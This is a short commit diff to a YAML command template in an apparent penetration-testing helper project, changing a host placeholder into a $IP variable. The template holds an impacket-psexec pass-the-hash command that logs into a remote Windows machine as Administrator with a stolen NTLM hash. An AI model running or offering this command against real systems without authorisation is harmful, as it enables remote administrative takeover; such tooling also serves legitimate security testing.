feat: switched from IP placeholder to $IP var

--- a/src/profi/templates/scripts/impacket-psexec-pass-the-hash.yaml
+++ b/src/profi/templates/scripts/impacket-psexec-pass-the-hash.yaml
@@ -6,4 +6,4 @@ metadata:
   author: "Unknown"
 
 content: |
-  impacket-psexec -hashes 00000000000000000000000000000000:<NTLM-hash> Administrator@<IP>
+  impacket-psexec -hashes 00000000000000000000000000000000:<NTLM-hash> Administrator@$IP
